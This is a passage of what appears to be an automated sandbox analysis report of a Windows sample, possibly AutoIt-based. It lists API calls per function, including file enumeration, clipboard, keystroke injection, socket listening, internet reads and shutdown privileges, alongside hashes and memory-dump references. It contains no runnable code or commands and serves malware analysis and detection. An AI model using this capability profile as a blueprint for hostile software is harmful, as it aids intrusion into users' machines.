                                                                                                                                                            • Part of subcall function 00167C0C: GetFileAttributesW.KERNEL32(?,00166A7B), ref: 00167C0D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166B9D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166BBB
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00166BE2
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00166BF8
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00166C57
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166C6A
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166C7D
                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00166CAB
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00166D37
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00166D53
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00166D61
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find_wcscat$File__wsplitpath$Close$AttributesFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                          • String ID: \*.*
                                                                                                                                                          • API String ID: 481317943-1173974218
                                                                                                                                                          • Opcode ID: af285b04bdf1df7e3ddb779142bdee230dea7c524f3b4cd2d08e576f060a04fe
                                                                                                                                                          • Instruction ID: 0a5c452cf4823b30faa4133b919baf855b6379dcf2167077ecbd092b5208093f
                                                                                                                                                          • Opcode Fuzzy Hash: af285b04bdf1df7e3ddb779142bdee230dea7c524f3b4cd2d08e576f060a04fe
                                                                                                                                                          • Instruction Fuzzy Hash: 8B515F7290016CAADF21EBA0DC84EEE777CAF19304F0445D6E54AE3451EB319B98CF61
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                          • API String ID: 0-2893523900
                                                                                                                                                          • Opcode ID: 8a2641bd09c2d7a231079ac592950c26ac338ade03c01bb54c2ee5f788bf68a7
                                                                                                                                                          • Instruction ID: baae77a6fa6f19b2fcaeaa12b8aa8290393a37b5012dbc496b639e20e7d3214f
                                                                                                                                                          • Opcode Fuzzy Hash: 8a2641bd09c2d7a231079ac592950c26ac338ade03c01bb54c2ee5f788bf68a7
                                                                                                                                                          • Instruction Fuzzy Hash: 7B62A175E00229CBDF28CF98D8817AEB7B5BF59310F25816AE815EB2C1D7749E50CB90
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                            • Part of subcall function 00167C0C: GetFileAttributesW.KERNEL32(?,00166A7B), ref: 00167C0D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166E7E
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00166E99
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00166EAE
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00166EDD
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166EEF
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166F01
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00166F22
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00166F3D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind_wcscat$AttributesCloseFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                          • String ID: \*.*
                                                                                                                                                          • API String ID: 1343497842-1173974218
                                                                                                                                                          • Opcode ID: ce93a670b198f9e0f64a300affeef04e6fa26980643b0900cafb741ed17d6837
                                                                                                                                                          • Instruction ID: 5bbad998a054712a093d156ed9efd2a28f1635e10475d8fffc66010669aa9733
                                                                                                                                                          • Opcode Fuzzy Hash: ce93a670b198f9e0f64a300affeef04e6fa26980643b0900cafb741ed17d6837
                                                                                                                                                          • Instruction Fuzzy Hash: E321C1B2408344BAC610EBA0DC849DBBBDCAF69214F044E5EF5E5C3052EB30D65D87A2
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                          • Opcode ID: f366db82355d1ea1b52bf188df9da64ca3ae13be99ce8330ccfa8b1f8634ed1f
                                                                                                                                                          • Instruction ID: 17038cce53aca18b7f2bb25053575fd5c9571daaab4a8a77288827d8e0c30c81
                                                                                                                                                          • Opcode Fuzzy Hash: f366db82355d1ea1b52bf188df9da64ca3ae13be99ce8330ccfa8b1f8634ed1f
                                                                                                                                                          • Instruction Fuzzy Hash: 9321AE31604610AFDB00AF65EC59B6DBBB8FF55720F00801AF90E9B6A1DB34ED80DB91
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001724F6
                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00172526
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0017253A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172555
                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001725F3
                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00172609
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 713712311-438819550
                                                                                                                                                          • Opcode ID: 597bf002918c3c6da8465f941c32cbe5611d40870497d7f468e0761ec302a6d7
                                                                                                                                                          • Instruction ID: fae6213879ebb2e4349838ab5f05cb6d50db0f712119304ed30f5c1cc2513900
                                                                                                                                                          • Opcode Fuzzy Hash: 597bf002918c3c6da8465f941c32cbe5611d40870497d7f468e0761ec302a6d7
                                                                                                                                                          • Instruction Fuzzy Hash: 2E417A7190021AAFCF14DFA4DC49AEEBBB4FF19310F108456F819A7190EB349A95CFA0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: 74391fd9675a6df1ee2dc23afa105bdb5aacbd4daf241f8dc5701221913acdad
                                                                                                                                                          • Instruction ID: 8fc03fd5c5f9522ccf9178217f4367f4c425f24c281da8096c27f283551afce8
                                                                                                                                                          • Opcode Fuzzy Hash: 74391fd9675a6df1ee2dc23afa105bdb5aacbd4daf241f8dc5701221913acdad
                                                                                                                                                          • Instruction Fuzzy Hash: 0512AD70A01619EFDF14DFA4E981AAEB7F5FF58300F204569E806E7250EB35AD61CB50
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B736: GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                            • Part of subcall function 0013B736: ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          • ReleaseCapture.USER32 ref: 0018EB1A
                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0018EBC2
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0018EBD5
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0018ECAE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                          • API String ID: 973565025-2107944366
                                                                                                                                                          • Opcode ID: 0a3bffc227f4047577f39dd390f378789ae66d997063b9d56d34c04da6fbbeba
                                                                                                                                                          • Instruction ID: 091aea94e9992fc225b4ce4d642829d63fcc14195caba463d9c382f086af5f18
                                                                                                                                                          • Opcode Fuzzy Hash: 0a3bffc227f4047577f39dd390f378789ae66d997063b9d56d34c04da6fbbeba
                                                                                                                                                          • Instruction Fuzzy Hash: AE518A71204344AFD704EF24DC96FAE7BE5FB88700F404A29F986972E1DB709A54CB52
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015BF0F
                                                                                                                                                            • Part of subcall function 0015BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015BF3C
                                                                                                                                                            • Part of subcall function 0015BEC3: GetLastError.KERNEL32 ref: 0015BF49
                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0016830C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                                                                          • API String ID: 2234035333-194228
                                                                                                                                                          • Opcode ID: a637ac11d62f7899cc5f6441bc0e73eebc8eb12c04098da0ca90a617d7654fc6
                                                                                                                                                          • Instruction ID: 55997fd58969aef154275f00f7753608fac65025d6f6bfee0a512876b5fa0dbe
                                                                                                                                                          • Opcode Fuzzy Hash: a637ac11d62f7899cc5f6441bc0e73eebc8eb12c04098da0ca90a617d7654fc6
                                                                                                                                                          • Instruction Fuzzy Hash: 6F01F271A44311ABE76826788C8BBBB3268FB01B81F140A24F953E63C2DF60DC1082A0
                                                                                                                                                          APIs
                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00179235
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179244
                                                                                                                                                          • bind.WS2_32(00000000,?,00000010), ref: 00179260
                                                                                                                                                          • listen.WS2_32(00000000,00000005), ref: 0017926F
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179289
                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 0017929D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279440585-0
                                                                                                                                                          • Opcode ID: ede56f5156b88e988cb37a4e4819fe2cd034e9b9a4718a43bda93e69f3218891
                                                                                                                                                          • Instruction ID: c06e0a47e6e7064e9d0ee72ec8c25ba6184a9bc5fe9b4dcffd8e211f258b4d2d
                                                                                                                                                          • Opcode Fuzzy Hash: ede56f5156b88e988cb37a4e4819fe2cd034e9b9a4718a43bda93e69f3218891
                                                                                                                                                          • Instruction Fuzzy Hash: 6221A231600610AFCB04FF64DC45B6E77B9EF45324F108159F95AA7792CB30AD45CB51
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                          • _memmove.LIBCMT ref: 00193020
                                                                                                                                                          • _memmove.LIBCMT ref: 00193135
                                                                                                                                                          • _memmove.LIBCMT ref: 001931DC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1300846289-0
                                                                                                                                                          • Opcode ID: 96446698cac9b62b3263d758aeee55c4de14334792021fb9137e4d2e786323a3
                                                                                                                                                          • Instruction ID: 34aff9cb3fb47d82c39ec677abcc7567a659192b0f4ce1baf74e1af50d06cfc0
                                                                                                                                                          • Opcode Fuzzy Hash: 96446698cac9b62b3263d758aeee55c4de14334792021fb9137e4d2e786323a3
                                                                                                                                                          • Instruction Fuzzy Hash: D002B070E00219DFCF08DF64D981AAEBBF5EF58300F558069E806DB265EB31DA65CB91
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0017ACD3: inet_addr.WS2_32(00000000), ref: 0017ACF5
                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0017973D
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 00179760
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4170576061-0
                                                                                                                                                          • Opcode ID: 85c5839f0b8016a2dc9dfeaad0a42c417d3bc9801fc4b1ef71f4326a2b8ca440
                                                                                                                                                          • Instruction ID: 384953d6daf9a4e90cf5f12133f1cb815926d1c4b3b8226dad415e0649459e45
                                                                                                                                                          • Opcode Fuzzy Hash: 85c5839f0b8016a2dc9dfeaad0a42c417d3bc9801fc4b1ef71f4326a2b8ca440
                                                                                                                                                          • Instruction Fuzzy Hash: 2441F671600214AFDB14AF68DC82E7E77EDEF54328F148048F956AB392DB749E418B91
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0016F37A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016F3AA
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016F3BF
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0016F3D0
                                                                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0016F3FE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2387731787-0
                                                                                                                                                          • Opcode ID: d9e688b389b0ee16ba45f5f919a26ec2dbf75afdba7a5163008e746865ee2098
                                                                                                                                                          • Instruction ID: 8aed12908d5eab6706d5ee5b511cfc50706347dd141a5c8f32da033d87d49a7a
                                                                                                                                                          • Opcode Fuzzy Hash: d9e688b389b0ee16ba45f5f919a26ec2dbf75afdba7a5163008e746865ee2098
                                                                                                                                                          • Instruction Fuzzy Hash: F941CC756007029FC708DF28D890A9AB3E4FF59324F10412EE95ACB7A1DB31E956CB91
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0016439C
                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 001643B8
                                                                                                                                                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00164425
                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00164483
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                          • Opcode ID: 39dad6e98b75506f28f6d7d8e6d4674756b5f35c23b9a17be9e0f311d46f1324
                                                                                                                                                          • Instruction ID: 3e6f68d99fcc493f7b200a2f5de60bf17b599d5edb7d8697015ee99619b5949e
                                                                                                                                                          • Opcode Fuzzy Hash: 39dad6e98b75506f28f6d7d8e6d4674756b5f35c23b9a17be9e0f311d46f1324
                                                                                                                                                          • Instruction Fuzzy Hash: 6F4125B0E00258AFEF348B64DC0A7FEBBB9AF55311F04415AF492936C1CB7489A5D761
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0018EFE2
                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0019F3C3,?,?,?,?,?), ref: 0018EFF7
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0018F041
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0019F3C3,?,?,?), ref: 0018F077
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1423138444-0
                                                                                                                                                          • Opcode ID: e28d87a404d5fd67e656067ed868412cf5e40d5d0d5f49cc61c7231c37f7b3e3
                                                                                                                                                          • Instruction ID: 0eb19ba8f1fb56b4a3bff631fc963ffa3897c176cf806eacb55253b4116163b0
                                                                                                                                                          • Opcode Fuzzy Hash: e28d87a404d5fd67e656067ed868412cf5e40d5d0d5f49cc61c7231c37f7b3e3
                                                                                                                                                          • Instruction Fuzzy Hash: 9A210131600118FFCB259F54D898EEE7BB6EF0A710F144068F9058B2A2C3359E92DF90
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0016221E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                          • String ID: ($|
                                                                                                                                                          • API String ID: 1659193697-1631851259
                                                                                                                                                          • Opcode ID: 6c368b557ec72a51b95fa5bb3980698937d691ade5dc2441c5f9bdd0c84a8544
                                                                                                                                                          • Instruction ID: d2f4c56b99b6ad19a04f21f20876e58db10845d87f7bd3af9c63d9db0de2aba4
                                                                                                                                                          • Opcode Fuzzy Hash: 6c368b557ec72a51b95fa5bb3980698937d691ade5dc2441c5f9bdd0c84a8544
                                                                                                                                                          • Instruction Fuzzy Hash: 70321575A00B059FC728CF69C490A6AB7F0FF48320B15C46EE99ADB7A1E770E951CB44
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0013AE5E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: 602a6e454bad67f258091526914450f49a6f6b02895a7187cdc81afaf559849f
                                                                                                                                                          • Instruction ID: b27fba514d7dc085e462343b46346d7d804f504dcaa13d548074c084369510ef
                                                                                                                                                          • Opcode Fuzzy Hash: 602a6e454bad67f258091526914450f49a6f6b02895a7187cdc81afaf559849f
                                                                                                                                                          • Instruction Fuzzy Hash: 66A126B4104204BADF2CAB295C88D7F3A5DEF52751F91413DF482D61A2DB2A9D42E373
                                                                                                                                                          APIs
                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00174A1E,00000000), ref: 001755FD
                                                                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00175629
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 599397726-0
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016EA95
                                                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0016EAEF
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0016EB3C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1682464887-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • GetParent.USER32(?), ref: 0019F4B5
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0013ADDD,?,?,?,00000006,?), ref: 0019F52F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 314495775-0
                                                                                                                                                          APIs
                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0016708D
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00167098
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseControlDeviceHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2349616827-0
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0016FD71
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0016FDA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                          • Opcode ID: 65bbb79f16ee8fd10f07f91b4da034a9aa4b86df9b4425032c6786e70924acfd
                                                                                                                                                          • Instruction ID: 8ef66a41c548491a1477d5a90c24a4decc0c48c54f7a30e5b28bb6e7532fa851
                                                                                                                                                          • Opcode Fuzzy Hash: 65bbb79f16ee8fd10f07f91b4da034a9aa4b86df9b4425032c6786e70924acfd
                                                                                                                                                          • Instruction Fuzzy Hash: 99116D726106009FD710EF68D845A6AB7E8FF99324F00855EF8AA9B291DB34ED158B81
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0019F352,?,?,?), ref: 0018F115
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0018F0FB
                                                                                                                                                          Memory Dump Source
